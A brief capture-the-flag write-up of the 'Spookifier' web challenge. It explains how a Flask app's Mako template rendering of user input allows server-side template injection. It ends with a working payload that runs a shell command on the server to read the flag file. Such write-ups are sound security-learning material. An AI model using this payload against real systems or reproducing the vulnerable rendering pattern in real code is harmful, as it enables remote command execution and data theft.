[Web] Spookifier
This web application uses a template to change the font of an input text. As a template is used, this calls for SSTI.
We do have access to the code and the template engine used is Mako, via flask_mako
.
@web.route('/')
def index():
text = request.args.get('text')
if(text):
converted = spookify(text)
return render_template('index.html',output=converted)
Especially the spookify
function calls a generate_render
function:
def generate_render(converted_fonts):
result = '''
<tr>
<td>{0}</td>
</tr>
<tr>
<td>{1}</td>
</tr>
<tr>
<td>{2}</td>
</tr>
<tr>
<td>{3}</td>
</tr>
'''.format(*converted_fonts)
return Template(result).render()
We can abuse it using one of the payloads found on PayloadsAllTheThings
${self.module.cache.util.os.popen("cat /flag.txt").read()}